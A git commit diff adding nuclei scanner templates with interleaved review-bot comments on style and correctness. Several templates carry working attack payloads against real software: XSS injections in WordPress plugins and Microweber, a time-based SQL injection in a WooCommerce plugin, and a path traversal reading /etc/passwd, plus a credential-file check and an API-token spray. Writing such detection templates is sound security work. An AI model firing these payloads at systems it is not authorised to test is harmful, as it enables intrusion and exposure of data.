Merge branch 'projectdiscovery:master' into master

patch-1
kh4sh3i 2022-10-25 14:41:21 +03:30 committed by GitHub
commit edebe08ef9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
29 changed files with 781 additions and 62 deletions


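--- a/.new-additions
+++ b/.new-additions
@@ -1,40 +1,23 @@
-cves/2021/CVE-2021-33851.yaml
-cves/2022/CVE-2022-0885.yaml
-cves/2022/CVE-2022-1574.yaml
-cves/2022/CVE-2022-28290.yaml
-cves/2022/CVE-2022-33901.yaml
-cves/2022/CVE-2022-41473.yaml
-default-logins/dataiku/dataiku-default-login.yaml
-exposed-panels/bmc/bmc-discovery-panel.yaml
-exposed-panels/dataiku-panel.yaml
-exposed-panels/hypertest-dashboard.yaml
-exposed-panels/novnc-login-panel.yaml
-exposed-panels/opengear-panel.yaml
-exposed-panels/piwigo-panel.yaml
-exposed-panels/processwire-login.yaml
-exposed-panels/qlik-sense-server.yaml
-exposed-panels/retool-login.yaml
-exposed-panels/sonic-wall-application.yaml
-exposed-panels/totemomail-panel.yaml
-exposures/configs/cakephp-config.yaml
-exposures/files/go-mod-disclosure.yaml
-exposures/files/travis-ci-disclosure.yaml
-exposures/tokens/loqate/loqate-api-key.yaml
-misconfiguration/iot-vdme-simulator.yaml
-misconfiguration/springboot/springboot-auditevents.yaml
-misconfiguration/springboot/springboot-features.yaml
-misconfiguration/springboot/springboot-jolokia.yaml
-misconfiguration/springboot/springboot-logfile.yaml
-misconfiguration/springboot/springboot-loggerconfig.yaml
-misconfiguration/springboot/springboot-status.yaml
-network/detection/gnu-inetutils-ftpd-detect.yaml
-network/detection/mikrotik-ftp-server-detect.yaml
-network/detection/proftpd-server-detect.yaml
-network/detection/xlight-ftp-service-detect.yaml
-ssl/weak-cipher-suites.yaml
-takeovers/surveysparrow-takeover.yaml
-technologies/joomla-detect.yaml
-technologies/open-journal-systems.yaml
-technologies/oracle/oracle-atg-commerce.yaml
-vulnerabilities/other/aerocms-sqli.yaml
-vulnerabilities/other/xenmobile-server-log4j.yaml
+cves/2022/CVE-2022-1007.yaml
+cves/2022/CVE-2022-1057.yaml
+cves/2022/CVE-2022-41840.yaml
+exposed-panels/code-server-login.yaml
+exposed-panels/git-repository-browser.yaml
+exposed-panels/gitblit-panel.yaml
+exposed-panels/maestro-login-panel.yaml
+exposed-panels/openfire-admin-panel.yaml
+exposed-panels/openvpn-admin.yaml
+exposed-panels/openvpn-connect.yaml
+exposed-panels/openvpn-router-management.yaml
+exposed-panels/superset-login.yaml
+exposed-panels/temenos-t24-login.yaml
+exposed-panels/turnkey-openvpn.yaml
+exposed-panels/xeams-admin-console.yaml
+exposures/files/cargo-lock-package.yaml
+exposures/files/cargo-toml-file.yaml
+exposures/files/db-xml-file.yaml
+misconfiguration/cadvisor-exposure.yaml
+misconfiguration/express-stack-trace.yaml
+network/detection/vmware-authentication-daemon-detect.yaml
+technologies/express-default-page.yaml
+token-spray/api-nytimes.yaml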


@ -1,7 +1,7 @@
id: CVE-2022-0928
info:
name: Microweber <1.2.12 - Stored Cross-Site Scripting
name: Microweber < 1.2.12 - Stored Cross-Site Scripting
author: amit-jd
severity: medium
description: |
@ -16,8 +16,8 @@ info:
cve-id: CVE-2022-0928
cwe-id: CWE-79
metadata:
verified: "true"
tags: authenticated,huntr,cve,cve2022,xss,microweber,cms
verified: true
tags: cve,cve2022,authenticated,huntr,xss,microweber,cms
requests:
- raw:
@ -36,7 +36,7 @@ requests:
id=0&name=vat1&type="><img+src%3dx+onerror%3dalert(document.domain)>&rate=10
- |-
- |
POST /module HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
@ -49,9 +49,9 @@ requests:
matchers:
- type: dsl
dsl:
- contains(body_3,'<td>\"><img src=x onerror=alert(document.domain)></td>')
- 'contains(body_3,"<img src=x onerror=alert(document.domain)></td>")'
- 'contains(all_headers_3,"text/html")'
- 'status_code==200'
- 'status_code_2 == 200 && status_code_3 == 200'
condition: and
# Enhanced by mp on 2022/09/14


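--- a/cves/2022/CVE-2022-1007.yaml
+++ b/cves/2022/CVE-2022-1007.yaml
@@ -0,0 +1,44 @@
+id: CVE-2022-1007
+info:
+name: Advanced Booking Calendar < 1.7.1 - Cross-Site Scripting
+author: 8arthur
+severity: medium
+description: |
+The Advanced Booking Calendar WordPress plugin before 1.7.1 does not sanitise and escape the room parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue
+reference:
+- https://wpscan.com/vulnerability/6f5b764b-d13b-4371-9cc5-91204d9d6358
+- https://wordpress.org/plugins/advanced-booking-calendar/
+- https://nvd.nist.gov/vuln/detail/cve-2022-1007
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+cvss-score: 6.1
+cve-id: CVE-2022-1007
+cwe-id: CWE-79
+metadata:
+verified: "true"
+tags: wp-plugin,advanced-booking-calendar,cve,cve2022,wp,authenticated,wpscan,wordpress,xss
+requests:
+- raw:
+- |
+POST /wp-login.php HTTP/1.1
+Host: {{Hostname}}
+Content-Type: application/x-www-form-urlencoded
+log={{username}}&pwd={{password}}&wp-submit=Log+In
+- |
+GET /wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=changeSaved&room=1111%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1
+Host: {{Hostname}}
+cookie-reuse: true
+req-condition: true
+matchers:
+- type: dsl
+dsl:
+- "contains(body_2, '<script>alert(document.domain)</script>')"
+- "contains(body_2, 'advanced-booking-calendar')"
+- "contains(all_headers_2, 'text/html')"
+- "status_code_2 == 200"
+condition: and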
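Review bot: `verified: "true"` under `metadata` is a quoted string, while the other new templates in this commit (gitblit-panel, openfire-admin-panel and the rest) write the bare boolean `verified: true`, and the CVE-2022-0928 hunk in this same commit rewrites the quoted form to the bare one. The CVE-2022-1057 section repeats the quoted form. Any consumer that reads this field as a boolean gets the string instead; the line should be `verified: true` in both files.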


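--- a/cves/2022/CVE-2022-1057.yaml
+++ b/cves/2022/CVE-2022-1057.yaml
@@ -0,0 +1,35 @@
+id: CVE-2022-1057
+info:
+name: Pricing Deals for WooCommerce < 2.0.3 - Unauthenticated SQL Injection
+author: theamanrawat
+severity: critical
+description: |
+The Pricing Deals for WooCommerce WordPress plugin through 2.0.2.02 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.
+reference:
+- https://wpscan.com/vulnerability/7c33ffc3-84d1-4a0f-a837-794cdc3ad243
+- https://wordpress.org/plugins/pricing-deals-for-woocommerce/
+- https://nvd.nist.gov/vuln/detail/CVE-2022-1057
+classification:
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+cvss-score: 9.8
+cve-id: CVE-2022-1057
+cwe-id: CWE-89
+metadata:
+verified: "true"
+tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,pricing-deals-for-woocommerce,unauth
+requests:
+- raw:
+- |
+@timeout: 15s
+GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1
+Host: {{Hostname}}
+matchers:
+- type: dsl
+dsl:
+- 'duration>=6'
+- 'status_code == 500'
+- 'contains(body, "been a critical error")'
+condition: and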
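Review bot: The three DSL conditions are AND-ed, so the template only reports a host that honours the six-second delay and also answers 500 with the WordPress "critical error" page; the status and body pair looks like an artefact of the one environment this was verified against, and a vulnerable install that returns 200 after sleeping is reported as clean. Conversely `duration>=6` on its own is met by any slow host, which is presumably why the two extra conditions were added. A more robust shape is to keep `duration>=6` and drop the status/body coupling, or to send a baseline request and compare the two durations as some time-based templates do. The `@timeout: 15s` header is fine as it leaves headroom over the 6-second delay.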


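--- a/cves/2022/CVE-2022-41840.yaml
+++ b/cves/2022/CVE-2022-41840.yaml
@@ -0,0 +1,36 @@
+id: CVE-2022-41840
+info:
+name: Welcart eCommerce <= 2.7.7 - Unauth Directory Traversal
+author: theamanrawat
+severity: high
+reference:
+- https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability
+- https://wordpress.org/plugins/usc-e-shop/
+- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41840
+classification:
+cve-id: CVE-2022-41840
+metadata:
+verified: true
+tags: cve,cve2022,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd"
+matchers-condition: and
+matchers:
+- type: regex
+part: body
+regex:
+- "root:.*:0:0:"
+- type: word
+part: header
+words:
+- "application/json"
+- type: status
+status:
+- 200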
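Review bot: The `classification` block carries only `cve-id`, while the other two CVE templates in this commit supply `cvss-metrics`, `cvss-score` and `cwe-id`, so nothing here backs `severity: high` and the template has no `description`. Add `cwe-id: CWE-22` for the path traversal, the CVSS vector and score once the NVD record has them, and a one-line `description` of the affected endpoint. The reference list would also benefit from the NVD link in the form the sibling templates use, `https://nvd.nist.gov/vuln/detail/CVE-2022-41840`, next to the MITRE entry.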


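--- a/exposed-panels/code-server-login.yaml
+++ b/exposed-panels/code-server-login.yaml
@@ -0,0 +1,30 @@
+id: code-server-login
+info:
+name: Code Server Login
+author: tess
+severity: info
+metadata:
+verified: true
+shodan-dork: http.title:"code-server login"
+tags: panel,detect,misc
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/login"
+host-redirects: true
+max-redirects: 2
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- "Welcome to code-server"
+- "Please log in below. Check the config file at ~/.config/code-server/config.yaml for the password."
+condition: and
+- type: status
+status:
+- 200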
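Review bot: The metadata key is `shodan-dork` here, and likewise in the git-repository-browser, gitblit-panel and maestro-login-panel sections, while every other new template in this commit uses `shodan-query`; if repository tooling collects dorks under one spelling, these four are silently skipped. Change the line to `shodan-query: http.title:"code-server login"` and the same in the other three. The tag list `panel,detect,misc` names no product either; `tags: panel,code-server` would follow the convention the gitblit and openfire templates use.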


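--- a/exposed-panels/git-repository-browser.yaml
+++ b/exposed-panels/git-repository-browser.yaml
@@ -0,0 +1,30 @@
+id: git-repository-browser
+info:
+name: Git Repository Browser Detect
+author: tess
+severity: info
+metadata:
+verified: true
+shodan-dork: http.title:"Git repository browser"
+tags: panel,git
+requests:
+- method: GET
+path:
+- "{{BaseURL}}"
+host-redirects: true
+max-redirects: 2
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- "Git repository browser"
+- "a fast webinterface for the git dscm"
+condition: and
+- type: status
+status:
+- 200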


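--- a/exposed-panels/gitblit-panel.yaml
+++ b/exposed-panels/gitblit-panel.yaml
@@ -0,0 +1,30 @@
+id: gitblit-panel
+info:
+name: Gitblit Login Panel Detect
+author: tess
+severity: info
+metadata:
+verified: true
+shodan-dork: http.title:"Gitblit"
+tags: panel,gitblit
+requests:
+- method: GET
+path:
+- "{{BaseURL}}"
+host-redirects: true
+max-redirects: 2
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- "<title>Gitblit</title>"
+- "Welcome to Gitblit"
+condition: or
+- type: status
+status:
+- 200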


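--- a/exposed-panels/maestro-login-panel.yaml
+++ b/exposed-panels/maestro-login-panel.yaml
@@ -0,0 +1,30 @@
+id: maestro-login-panel
+info:
+name: Maestro - LuCI Login Panel
+author: tess
+severity: info
+metadata:
+verified: true
+shodan-dork: http.title:"Maestro - LuCI"
+tags: panel,maestro,luci
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/cgi-bin/luci"
+host-redirects: true
+max-redirects: 2
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- "<title>Maestro - LuCI</title>"
+- "Please enter your username and password."
+condition: and
+- type: status
+status:
+- 200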


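--- a/exposed-panels/openfire-admin-panel.yaml
+++ b/exposed-panels/openfire-admin-panel.yaml
@@ -0,0 +1,30 @@
+id: openfire-admin-panel
+info:
+name: Openfire Admin Console
+author: theamanrawat
+severity: info
+metadata:
+verified: true
+shodan-query: http.title:"Openfire Admin Console"
+tags: panel,openfire,admin,console
+requests:
+- method: GET
+path:
+- '{{BaseURL}}'
+- '{{BaseURL}}/login.jsp'
+stop-at-first-match: true
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- '<title>Openfire Admin Console'
+- 'Openfire, Version:'
+condition: or
+- type: status
+status:
+- 200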


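--- a/exposed-panels/openvpn-admin.yaml
+++ b/exposed-panels/openvpn-admin.yaml
@@ -0,0 +1,31 @@
+id: openvpn-admin
+info:
+name: OpenVPN Admin Panel
+author: ritikchaddha
+severity: info
+metadata:
+verified: true
+shodan-query: http.title:"OpenVPN-Admin"
+tags: panel,openvpn,admin,config
+requests:
+- method: GET
+path:
+- '{{BaseURL}}'
+- '{{BaseURL}}/login'
+- '{{BaseURL}}/index.php'
+stop-at-first-match: true
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- '<title>OpenVPN-Admin'
+- '<title>OpenVPN Admin'
+condition: or
+- type: status
+status:
+- 200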


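--- a/exposed-panels/openvpn-connect.yaml
+++ b/exposed-panels/openvpn-connect.yaml
@@ -0,0 +1,25 @@
+id: openvpn-connect
+info:
+name: OpenVPN Connect Panel
+author: ritikchaddha
+severity: info
+metadata:
+verified: true
+shodan-query: http.title:"openvpn connect"
+tags: panel,openvpn,connect,vpn
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/?src=connect'
+host-redirects: true
+max-redirects: 2
+matchers:
+- type: word
+part: body
+words:
+- 'content="OpenVPN Connect'
+- '<title>OpenVPN Connect</title>'
+condition: or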
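Review bot: This is the only one of the four OpenVPN templates in the commit with no status matcher, so any response whose body carries `content="OpenVPN Connect` or the title — an error page or a redirect target after the two allowed hops included — is reported as a panel. The openvpn-admin and turnkey-openvpn sections pair the word matcher with a `type: status` matcher for `200` under `matchers-condition: and`; adding the same two-matcher structure here keeps the four consistent and removes the false positives. The `vpn` and `connect` tags duplicate what `openvpn` already says and could be dropped.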


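--- a/exposed-panels/openvpn-router-management.yaml
+++ b/exposed-panels/openvpn-router-management.yaml
@@ -0,0 +1,26 @@
+id: openvpn-router-management
+info:
+name: OpenVPN Server Router Management
+author: ritikchaddha
+severity: low
+metadata:
+verified: true
+shodan-query: http.html:"Router Management - Server OpenVPN"
+tags: panel,openvpn,router
+requests:
+- method: GET
+path:
+- '{{BaseURL}}'
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- "Router Management - Server OpenVPN"
+- type: status
+status:
+- 200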
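Review bot: `severity: low` is out of line with the other panel detections in this commit, which are all `severity: info` (openvpn-admin, openvpn-connect, turnkey-openvpn); a fingerprint of a login page carries no vulnerability by itself. The single word match on `Router Management - Server OpenVPN` does not establish that the management page is reachable without authentication, so unless that is the finding the line should read `severity: info`, with the unauthenticated-access claim, if intended, stated in a `description` and reflected in the matchers.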


@ -1,8 +1,8 @@
id: rundeck-login
info:
name: RunDeck Login
author: DhiyaneshDk
name: RunDeck Login Panel
author: DhiyaneshDk, daffainfo
severity: info
metadata:
verified: true
@ -16,14 +16,24 @@ requests:
host-redirects: true
max-redirects: 2
matchers-condition: or
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Rundeck - Login</title>'
- 'alt="Rundeck"'
- '/assets/rundeck' ## For old rundeck
condition: or
- type: word
- type: status
status:
- 200
extractors:
- type: regex
part: body
words:
- 'RUNDECK ENTERPRISE - Login</title>'
group: 1
regex:
- 'utm_medium=([0-9.]+)-'
- 'data-version-string=\"([0-9.-]+)\"' ## Detection version on old rundeck
- '<span class="version">([0-9.-]+)<\/span>' ## Detection on very old rudneck
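Review bot: The comment on the last extractor line misspells the product, `## Detection on very old rudneck`, and the three inline comments in this hunk use `##` with no space after the hash where the file's convention and yamllint expect `# `; for example `# Detection on very old rundeck` and `# For old rundeck`. The `data-version-string=\"([0-9.-]+)\"` pattern keeps a literal backslash before each quote inside a single-quoted YAML scalar; the regex engine tolerates the escaped quote, but `'data-version-string="([0-9.-]+)"'` is the plain form and matches the style of the `<span class="version">` pattern below it.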


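--- a/exposed-panels/superset-login.yaml
+++ b/exposed-panels/superset-login.yaml
@@ -0,0 +1,35 @@
+id: superset-login
+info:
+name: Superset Login
+author: DhiyaneshDk
+severity: info
+metadata:
+verified: true
+shodan-query: http.favicon.hash:1582430156
+tags: panel,superset
+requests:
+- method: GET
+path:
+- '{{BaseURL}}'
+- '{{BaseURL}}/login'
+stop-at-first-match: true
+host-redirects: true
+max-redirects: 2
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- 'alt="Superset"'
+- type: word
+part: header
+words:
+- "text/html"
+- type: status
+status:
+- 200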


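--- a/exposed-panels/temenos-t24-login.yaml
+++ b/exposed-panels/temenos-t24-login.yaml
@@ -0,0 +1,31 @@
+id: temenos-t24-login
+info:
+name: Temenos T24/Transact Login Pagel
+author: korteke
+severity: info
+description: Exposed Temenos T24 login panel
+reference:
+- https://www.temenos.com/products/transact/
+metadata:
+verified: true
+shodan-query: http.title:"t24 sign in"
+tags: panel,exposure,temenos
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/servlet/BrowserServlet"
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- '<title>T24 Sign in</title>'
+- 'value="CREATE.SESSION"'
+condition: and
+- type: status
+status:
+- 200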
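Review bot: The `name` line has a typo, `Temenos T24/Transact Login Pagel`; it should read `name: Temenos T24/Transact Login Panel`. The `exposure` tag is also unusual for a panel-detect template — the other panel templates in this commit use `panel,<product>` — so `tags: panel,temenos` would match the convention and keep this template out of the `exposure` tag set, which is otherwise used for file and data disclosures.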


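--- a/exposed-panels/turnkey-openvpn.yaml
+++ b/exposed-panels/turnkey-openvpn.yaml
@@ -0,0 +1,28 @@
+id: turnkey-openvpn
+info:
+name: TurnKey OpenVPN Panel
+author: ritikchaddha
+severity: info
+metadata:
+verified: true
+shodan-query: http.title:"TurnKey OpenVPN"
+tags: panel,openvpn,turnkey,webshell,vpn
+requests:
+- method: GET
+path:
+- '{{BaseURL}}'
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- 'TurnKey OpenVPN'
+- 'Web Shell'
+condition: and
+- type: status
+status:
+- 200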
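Review bot: The `webshell` tag on the tags line is misleading: the `Web Shell` string the matcher looks for is, as far as the appliance's landing page goes, the link to its browser-based terminal, not an attacker-planted web shell, and the repository uses the `webshell` tag for the latter, so this template would be pulled into scans and reports that filter on that tag. Drop it, `tags: panel,openvpn,turnkey,vpn`, and if the browser terminal is worth calling out, say so in a `description` rather than through a tag. This is the only one of the four OpenVPN templates in the commit without either a description or a reference.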


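--- a/exposed-panels/xeams-admin-console.yaml
+++ b/exposed-panels/xeams-admin-console.yaml
@@ -0,0 +1,30 @@
+id: xeams-admin-console
+info:
+name: Xeams Admin Console
+author: theamanrawat
+severity: info
+metadata:
+verified: true
+shodan-query: http.title:"Xeams Admin"
+tags: panel,xeams,admin,console
+requests:
+- method: GET
+path:
+- '{{BaseURL}}'
+- '{{BaseURL}}/FrontController'
+stop-at-first-match: true
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- '<title>Xeams Admin Console'
+- 'eXtended Email And Messaging Server</span>'
+condition: or
+- type: status
+status:
+- 200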


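--- a/exposures/files/cargo-lock-package.yaml
+++ b/exposures/files/cargo-lock-package.yaml
@@ -0,0 +1,30 @@
+id: cargo-lock-package
+info:
+name: Cargo Lock Packages Disclosure
+author: DhiyaneshDk
+severity: info
+reference:
+- https://raw.githubusercontent.com/maurosoria/dirsearch/master/db/dicc.txt
+metadata:
+verified: true
+shodan-query: html:"Cargo.lock"
+tags: exposure,files,cargo
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/Cargo.lock'
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- "[[package]]"
+- "dependencies = ["
+condition: and
+- type: status
+status:
+- 200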


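--- a/exposures/files/cargo-toml-file.yaml
+++ b/exposures/files/cargo-toml-file.yaml
@@ -0,0 +1,30 @@
+id: cargo-toml-file
+info:
+name: Cargo TOML File Disclosure
+author: DhiyaneshDk
+severity: info
+reference:
+- https://doc.rust-lang.org/cargo/reference/manifest.html
+metadata:
+verified: true
+shodan-query: html:"Cargo.toml"
+tags: exposure,files,cargo
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/Cargo.toml'
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- "[package]"
+- "[dependencies]"
+condition: and
+- type: status
+status:
+- 200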


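--- a/exposures/files/db-xml-file.yaml
+++ b/exposures/files/db-xml-file.yaml
@@ -0,0 +1,30 @@
+id: db-xml-file
+info:
+name: db.xml File Exposure
+author: tess
+severity: medium
+metadata:
+verified: true
+tags: misconfig,db,files,exposure
+requests:
+- method: GET
+path:
+- "{{BaseURL}}/db.xml"
+host-redirects: true
+max-redirects: 2
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- "<ServerName>"
+- "<DBPASS>"
+- "<DBtype>"
+condition: and
+- type: status
+status:
+- 200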
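Review bot: The template has no `description` or `reference`, so a reader cannot tell which product writes a `db.xml` containing `<ServerName>`, `<DBPASS>` and `<DBtype>`, nor why `severity: medium` was chosen. The `<DBPASS>` element suggests the file holds a database password in clear, in which case `high` is what the repository usually assigns to credential-file disclosures; if the value is normally empty or hashed, `medium` is defensible but should be justified. Add a one-line `description` naming the product and what the file contains, and a `reference` to its documentation.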


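--- a/misconfiguration/cadvisor-exposure.yaml
+++ b/misconfiguration/cadvisor-exposure.yaml
@@ -0,0 +1,31 @@
+id: cadvisor-exposure
+info:
+name: cAdvisor Exposure
+author: DhiyaneshDk
+severity: medium
+metadata:
+verified: true
+shodan-query: title:"cAdvisor"
+tags: exposure,misconfig,dashboard
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/containers/'
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- "<title>cAdvisor - /</title>"
+- type: word
+part: header
+words:
+- "text/html"
+- type: status
+status:
+- 200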


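--- a/misconfiguration/express-stack-trace.yaml
+++ b/misconfiguration/express-stack-trace.yaml
@@ -0,0 +1,33 @@
+id: express-stack-trace
+info:
+name: Express Stack Trace
+author: DhiyaneshDk
+severity: low
+metadata:
+verified: true
+shodan-query: html:"Welcome to Express"
+tags: misconfig,express
+requests:
+- method: GET
+path:
+- '{{BaseURL}}/{{randstr}}'
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- "NotFoundError: Not Found"
+- "at Function.handle"
+condition: and
+- type: word
+part: header
+words:
+- "text/html"
+- type: status
+status:
+- 404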
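Review bot: The `shodan-query: html:"Welcome to Express"` line is the same query as the express-default-page template added in this commit; it locates the default landing page, whereas nothing in this template's matchers (`NotFoundError: Not Found`, `at Function.handle`, status 404) depends on that page being present. Either drop the query here or add a `description` explaining that the stack-trace leak is what the template reports and that the landing page is only a hint for where Express is deployed with development error output enabled.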


@ -6,7 +6,7 @@ info:
severity: info
description: |
This template searches for missing HTTP security headers. The impact of these missing headers can vary.
tags: misconfig,generic
tags: misconfig,headers,generic
requests:
- method: GET


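--- a/network/detection/vmware-authentication-daemon-detect.yaml
+++ b/network/detection/vmware-authentication-daemon-detect.yaml
@@ -0,0 +1,32 @@
+id: vmware-authentication-daemon
+info:
+name: VMware Authentication Daemon Detection
+author: pussycat0x
+severity: info
+description: |
+vmauthd is the VMWare authentication daemon that is included with many VMWare products, including ESX(i), and Workstation.
+metadata:
+verified: true
+shodan-query: 'product:"VMware Authentication Daemon"'
+tags: network,vmware,authenticated
+network:
+- inputs:
+- data: "\n"
+host:
+- "{{Hostname}}"
+- "{{Host}}:902"
+matchers:
+- type: word
+words:
+- "ServerDaemonProtocol:SOAP"
+- "MKSDisplayProtocol:VNC"
+condition: and
+extractors:
+- type: regex
+regex:
+- "VMware Authentication Daemon Version ([0-9.]+)"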
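Review bot: The `authenticated` tag on the tags line is wrong for this template: the probe sends a bare newline to port 902 and matches the banner, needing no credentials, while `authenticated` in this repository marks templates that log in first (compare the CVE-2022-1007 section in this commit). The line should be `tags: network,vmware,detect`. The `id` is `vmware-authentication-daemon` whereas the file list in this commit names the file `vmware-authentication-daemon-detect.yaml`; if the repository's validation requires the id to equal the file stem, one of the two must change, and the other network detection templates in the list end in `-detect`.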


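--- a/technologies/express-default-page.yaml
+++ b/technologies/express-default-page.yaml
@@ -0,0 +1,33 @@
+id: express-default-page
+info:
+name: Express Default Page
+author: DhiyaneshDk
+severity: info
+metadata:
+verified: true
+shodan-query: html:"Welcome to Express"
+tags: tech,express
+requests:
+- method: GET
+path:
+- '{{BaseURL}}'
+matchers-condition: and
+matchers:
+- type: word
+part: body
+words:
+- "<title>Express</title>"
+- "Welcome to Express"
+condition: and
+- type: word
+part: header
+words:
+- "text/html"
+- type: status
+status:
+- 200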


@ -18,6 +18,7 @@ requests:
path:
- '{{BaseURL}}'
- '{{BaseURL}}/login'
- '{{BaseURL}}/nextcloud/login'
- '{{BaseURL}}/nextcloud/index.php/login'
stop-at-first-match: true


@ -1,23 +1,24 @@
id: wordpress-detect
info:
name: WordPress Detection
author: pdteam
name: WordPress Detect
author: pdteam,daffainfo
severity: info
metadata:
verified: true
shodan-query: http.component:"WordPress"
tags: tech,wordpress
tags: tech,wordpress,cms,wp
requests:
- method: GET
path:
- "{{BaseURL}}"
- '{{BaseURL}}'
- '{{BaseURL}}/feed/'
- '{{BaseURL}}/?feed=rss2' #alternative if /feed/ is blocked
host-redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: or
matchers:
- type: regex
regex:
- '<link[^>]+s\d+\.wp\.com'
@ -25,6 +26,14 @@ requests:
- '<!--[^>]+WP-Super-Cache'
condition: or
- type: word
part: body
words:
- '<generator>'
- '<link>'
- '<title>'
condition: and
- type: word
words:
- 'wp-login.php'
@ -38,4 +47,4 @@ requests:
- type: regex
group: 1
regex:
- 'content="WordPress ([0-9.]+)"'
- '(?m)https:\/\/wordpress.org\/\?v=([0-9.]+)'
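Review bot: The new word matcher that requires `<generator>`, `<link>` and `<title>` together in the body is satisfied by essentially any RSS 2.0 feed, and because the request list now also fetches `/feed/` and `/?feed=rss2` under `matchers-condition: or`, a non-WordPress site serving a feed at either path is reported as WordPress. Tie the match to the product instead, for example replace the three words with `- '<generator>https://wordpress.org/?v='`, the same string the new extractor pattern `https:\/\/wordpress.org\/\?v=([0-9.]+)` keys on, or fold it into the regex matcher above it. The `#alternative if /feed/ is blocked` comment on the `/?feed=rss2` path also wants a space after the hash to match the file's comment style.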


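--- a/token-spray/api-nytimes.yaml
+++ b/token-spray/api-nytimes.yaml
@@ -0,0 +1,26 @@
+id: api-nytimes
+info:
+name: NYTimes API Test
+author: daffainfo
+severity: info
+description: NYTimes API Test
+reference:
+- https://developer.nytimes.com/apis
+tags: token-spray,nytimes
+self-contained: true
+requests:
+- raw:
+- |
+GET https://api.nytimes.com/svc/mostpopular/v2/shared/1.json?api-key={{token}} HTTP/1.1
+Host: api.nytimes.com
+matchers:
+- type: word
+part: body
+words:
+- '"status":'
+- '"copyright":'
+- '"num_results":'
+condition: and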